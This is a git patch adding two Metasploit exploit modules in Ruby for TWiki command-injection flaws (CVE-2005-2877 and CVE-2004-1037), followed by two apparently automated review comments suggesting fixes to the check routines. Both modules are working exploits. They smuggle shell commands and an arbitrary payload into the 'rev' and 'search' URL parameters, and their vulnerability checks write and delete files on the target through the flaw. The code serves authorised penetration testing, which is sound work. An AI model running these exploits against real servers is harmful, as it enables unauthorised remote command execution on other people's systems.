From 6414821ea860c6f33d9129d9af0e9648be5972a9 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Sun, 21 Feb 2010 20:31:09 +0000 Subject: [PATCH] add exploit modules for CVEs 2005-2877 and 2004-1037 git-svn-id: file:///home/svn/framework3/trunk@8578 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/unix/webapp/twiki_history.rb | 135 ++++++++++++++++++ modules/exploits/unix/webapp/twiki_search.rb | 131 +++++++++++++++++ 2 files changed, 266 insertions(+) create mode 100644 modules/exploits/unix/webapp/twiki_history.rb create mode 100644 modules/exploits/unix/webapp/twiki_search.rb diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb new file mode 100644 index 0000000000..cf3ba94039 --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_history.rb 
@@ -0,0 +1,135 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki History TWikiUsers rev Parameter Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the history component of TWiki. + By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers + script, an attacker can execute arbitrary OS commands. + }, + 'Author' => + [ + 'B4dP4nd4', # original discovery + 'jduck' # metasploit version + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2005-2877' ], + [ 'OSVDB', '19403' ], + [ 'BID', '14384' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev' ] + ], + 'Privileged' => true, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => '', + 'Space' => 1024, + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Sep 14 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), + ], self.class) + end + + + # + # NOTE: This is not perfect, since it requires write access to the bin + # directory. Unfortunately, detrmining the main directory isn't + # trivial, or otherwise I would write there (required to be writable + # per installation steps). 
+ # + def check + test_file = rand_text_alphanumeric(8+rand(8)) + cmd_base = datastore['URI'] + '/view/Main/TWikiUsers?rev=' + test_url = datastore['URI'] + '/' + test_file + + # first see if it already exists (it really shouldn't) + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.code != 404) + print_error("WARNING: The test file exists already!") + return Exploit::CheckCode::Safe + end + + # try to create it + print_status("Attempting to create #{test_url} ...") + rev = rand_text_numeric(1+rand(5)) + ' `touch ' + test_file + '`#' + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(rev) + }, 25) + if (not res) or (res.code != 200) + return Exploit::CheckCode::Safe + end + + # try to run it, 500 code == successfully made it + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.code != 500) + return Exploit::CheckCode::Safe + end + + # delete the tmp file + print_status("Attempting to delete #{test_url} ...") + rev = rand_text_numeric(1+rand(5)) + ' `rm -f ' + test_file + '`#' + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(rev) + }, 25) + if (not res) or (res.code != 200) + print_error("WARNING: unable to remove test file (#{test_file})") + end + + return Exploit::CheckCode::Vulnerable + end + + + def exploit + + rev = rand_text_numeric(1+rand(5)) + rev << ' `' + payload.encoded + '`#' + query_str = datastore['URI'] + '/view/Main/TWikiUsers' + query_str << '?rev=' + query_str << Rex::Text.uri_encode(rev) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => query_str, + }, 25) + + if (res and res.code == 200) + print_status("Successfully sent exploit request") + else + raise RuntimeError, "Error sending exploit request" + end + + handler + end + +end diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb new file mode 100644 index 0000000000..303bccec6f --- /dev/null +++ b/modules/exploits/unix/webapp/twiki_search.rb 
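Review bot: In `check`, the first probe for the test file folds a missing response into the "exists already" branch: `if (not res) or (res.code != 404)` prints "WARNING: The test file exists already!" and returns Safe when the target simply did not answer, so an unreachable or slow host is reported as not vulnerable with a misleading message; a guard such as `return Exploit::CheckCode::Unknown unless res` before `if res.code != 404` (and the same for the later probes) keeps the three outcomes distinct. The metadata sets `'Privileged' => true` while the adjacent comment says "web server context"; the injected command runs as whatever user serves the CGI, which is not normally root, so unless TWiki is known to run privileged this looks like it should be `false`. The check is also intrusive — it creates and then deletes a file in the bin directory through the vulnerability itself and relies on the server returning 500 for a non-executable file in a CGI directory, which presumably varies by web server configuration — so a header comment stating `# NOTE: intrusive check — writes and removes a temp file in the target's bin directory` would warn operators before they run it.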
@@ -0,0 +1,131 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TWiki Search Function Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the search component of TWiki. + By passing a 'search' parameter containing shell metacharacters to the + 'WebSearch' script, an attacker can execute arbitrary OS commands. + }, + 'Author' => + [ + # Unknown - original discovery + 'jduck' # metasploit version + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-1037' ], + [ 'OSVDB', '11714' ], + [ 'BID', '11674' ], + [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ] + ], + 'Privileged' => true, # web server context + 'Payload' => + { + 'DisableNops' => true, + 'BadChars' => ' ', + 'Space' => 1024, + }, + 'Platform' => [ 'unix' ], + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Oct 01 2004', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), + ], self.class) + end + + + def check + content = rand_text_alphanumeric(16+rand(16)) + test_file = rand_text_alphanumeric(8+rand(8)) + cmd_base = datastore['URI'] + '/view/Main/WebSearch?search=' + test_url = datastore['URI'] + '/view/Main/' + test_file + + # first see if it already exists (it really shouldn't) + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (res.body.match(content)) + print_error("WARNING: The test file exists already!") + return 
Exploit::CheckCode::Safe + end + + # try to create it + print_status("Attempting to create #{test_url} ...") + search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(search) + }, 25) + if (not res) or (res.code != 200) + return Exploit::CheckCode::Safe + end + + # try to run it, 500 code == successfully made it + res = send_request_raw({ + 'uri' => test_url + }, 25) + if (not res) or (not res.body.match(content)) + return Exploit::CheckCode::Safe + end + + # delete the tmp file + print_status("Attempting to delete #{test_url} ...") + search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'" + res = send_request_raw({ + 'uri' => cmd_base + Rex::Text.uri_encode(search) + }, 25) + if (not res) or (res.code != 200) + print_error("WARNING: unable to remove test file (#{test_file})") + end + + return Exploit::CheckCode::Vulnerable + end + + + def exploit + + search = rand_text_alphanumeric(1+rand(8)) + search << "';" + payload.encoded + ";#\'" + + query_str = datastore['URI'] + '/view/Main/WebSearch' + query_str << '?search=' + query_str << Rex::Text.uri_encode(search) + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => query_str, + }, 25) + + if (res and res.code == 200) + print_status("Successfully sent exploit request") + else + raise RuntimeError, "Error sending exploit request" + end + + handler + end + +end
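Review bot: The comment `# try to run it, 500 code == successfully made it` in `check` does not describe the condition below it, which tests `res.body.match(content)` rather than a status code; it appears copied from the history module and should read something like `# fetch the topic and look for the random marker we echoed into the file`. The same method treats a nil response from the first probe as "The test file exists already!" and returns Safe, so a dead target is misreported; `return Exploit::CheckCode::Unknown unless res` ahead of the body check would separate the cases. `content` is alphanumeric, so `match` is safe here, but `res.body.include?(content)` states the intent (a literal substring, not a regex) more precisely.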